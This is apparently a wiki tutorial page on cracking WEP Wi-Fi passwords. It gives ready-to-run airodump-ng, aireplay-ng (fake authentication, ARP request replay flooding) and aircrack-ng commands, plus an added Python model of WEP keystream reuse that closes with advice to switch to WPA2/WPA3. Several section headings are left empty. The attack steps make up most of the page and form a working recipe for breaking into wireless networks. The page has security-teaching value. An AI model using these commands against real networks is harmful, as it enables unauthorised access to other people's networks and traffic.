5. Gaining Access - WEP Cracking

Basics

How Encryption works

WEP Cracking

Weakness

We can use the tool aircrack-ng to determine the keystream

To crack WEP we need to

I am assuming you have already done Parts 1 and 2 of this tutorial.

1. Capture a large amount of packets/IVs (airodump-ng)

airodump-ng --bssid 11:22:33:44:55:66 --channel 12 --write ~/wep-cap wlan0

2. Analyse the captured IVs and crack the key (aircrack-ng)

aircrack-ng ~/wep-cap-01.cap

It should look something like this:

[Screenshot: Bildschirmfoto vom 2023-02-10 20-15-05.png]

If the ASCII key isn't displayed, which is sometimes the case, just use the hex key shown between the brackets and remove the colons, like this: 41:73:32:33:70 -> 4173323370

This means the target router will accept either As23p or 4173323370 as the password.
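The "Weakness" section above says aircrack-ng determines the keystream from captured IVs, and this section shows that the hex and ASCII forms of a key are just two spellings of the same bytes. The following is an added example, not code from the tutorial: it models why WEP leaks its keystream. It assumes a constructed 40-bit root key, textbook RC4 keyed with IV || root key, a 3-byte IV sent in the clear, the CRC-32 ICV left out, and the 802.11 LLC/SNAP header as the known plaintext prefix that every ARP/IP frame starts with. Because the IV space is only 2^24, a busy network repeats IVs quickly, and two frames under the same IV share a keystream; the birthday-bound function shows how few frames that takes. The root key `As23p`, the IVs and the frame bodies are constructed sample values.

```python
"""Why WEP leaks its keystream: a minimal, constructed model (added example).

Assumptions (not from the tutorial): a 40-bit root key, a 24-bit IV, textbook RC4,
the CRC-32 ICV left out, and the 802.11 LLC/SNAP header used as known plaintext.
"""
from math import exp
from typing import Dict, Optional, Tuple

IV_BITS = 24
IV_SPACE = 1 << IV_BITS          # only 16,777,216 distinct IVs per root key

# Every 802.11 data frame carrying IP or ARP starts with this LLC/SNAP header,
# so the first plaintext bytes are known to anyone who captures the frame.
LLC_SNAP_HEADER = bytes.fromhex("aaaa030000000806")  # trailing 0x0806 = ARP


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Textbook RC4 (KSA + PRGA); returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(root_key: bytes, iv: int, plaintext: bytes) -> bytes:
    """WEP per-packet key is IV || root key; the IV is prepended in the clear."""
    iv_bytes = iv.to_bytes(3, "big")
    ks = rc4_keystream(iv_bytes + root_key, len(plaintext))
    return iv_bytes + bytes(p ^ k for p, k in zip(plaintext, ks))


def recover_keystream(frame: bytes, known_plaintext: bytes) -> Tuple[int, bytes]:
    """XOR a captured frame body with its known plaintext prefix -> (iv, keystream prefix)."""
    iv = int.from_bytes(frame[:3], "big")
    body = frame[3:3 + len(known_plaintext)]
    return iv, bytes(c ^ p for c, p in zip(body, known_plaintext))


def decrypt_prefix(frame: bytes, iv: int, keystream: bytes) -> Optional[bytes]:
    """Decrypt the start of another frame that reused the same IV; None if the IV differs."""
    if int.from_bytes(frame[:3], "big") != iv:
        return None
    body = frame[3:3 + len(keystream)]
    return bytes(c ^ k for c, k in zip(body, keystream))


def iv_collision_probability(frames: int) -> float:
    """Birthday bound: P(at least one repeated IV) among `frames` random 24-bit IVs."""
    return 1.0 - exp(-frames * (frames - 1) / (2 * IV_SPACE))


def wep_key_hex_to_ascii(colon_hex: str) -> str:
    """'41:73:32:33:70' -> 'As23p': both spellings denote the same key bytes."""
    return bytes.fromhex(colon_hex.replace(":", "")).decode("ascii")


def demo() -> Dict[str, object]:
    """Two constructed frames under one IV: the keystream from frame A decrypts frame B."""
    root_key = b"As23p"                              # constructed 40-bit key
    plain_a = LLC_SNAP_HEADER + b"ARP body A"
    plain_b = LLC_SNAP_HEADER + b"secret!!!!"
    frame_a = wep_encrypt(root_key, 0x0A0B0C, plain_a)
    frame_b = wep_encrypt(root_key, 0x0A0B0C, plain_b)  # same IV reused
    iv, ks = recover_keystream(frame_a, plain_a)
    return {
        "iv": iv,
        "leaked_prefix": decrypt_prefix(frame_b, iv, ks),
        "p_collision_5000": iv_collision_probability(5000),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Running it shows the whole of frame B recovered from frame A's known plaintext without ever touching the root key, and that roughly 5000 random IVs already give better than even odds of a repeat. This is the structural reason the tutorial needs "a large amount of IVs", and why WEP cannot be fixed by a longer key; the defensive answer is WPA2 or WPA3 on any network that is still running WEP.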

WEP Cracking

Problem:

Solution:

Fake Authentication

Problem:

APs communicate with connected clients

Solution:

1) Use airodump-ng

airodump-ng --bssid 11:22:33:44:55:66 --channel 11 --write arpreplay wlan0

2) Associate with the AP

aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h 48:5D:60:2A:45:25 wlan0

The MAC address 48:5D:60:2A:45:25 is an example of your wireless adapter's MAC address. You can get the MAC by typing:

ifconfig

[Screenshot: Bildschirmfoto vom 2023-02-10 20-56-14.png]

Just use the first 12 characters and replace the hyphens with colons.

After running aireplay-ng, the AUTH column should show OPN and a new station should appear. The station should be your adapter's MAC address.

[Screenshot: Bildschirmfoto vom 2023-02-10 20-59-21.png]

This means you are associated with, but not connected to, the network, so you can now communicate with the AP. Anything you send to this network will now be accepted, even though you are not connected to it.

ARP Request Replay Attack

Problem

Solution

This is the most reliable and easiest method.

1) Use airodump-ng

airodump-ng --bssid 11:22:33:44:55:66 --channel 11 --write arpreplay wlan0

2) Associate with the AP

aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h 48:5D:60:2A:45:25 wlan0

3) ARP Request Replay Attack

aireplay-ng --arpreplay -b 11:22:33:44:55:66 -h 48:5D:60:2A:45:25 wlan0

Now it will flood the access point with packets to generate IVs.

4) Now associate with the access point again

aireplay-ng --fakeauth 0 -a 11:22:33:44:55:66 -h 48:5D:60:2A:45:25 wlan0

5) And run aircrack-ng

aircrack-ng arpreplay-01.cap

For an easier layout, use Terminator as your terminal, so you can split the terminal and have several command lines open, or use a terminal multiplexer like tmux. I'd recommend running 1), 3) and 5) at the same time.


Revision #9
Created 10 February 2023 18:33:46 by tinfoil-hat
Updated 9 March 2023 18:06:05 by tinfoil-hat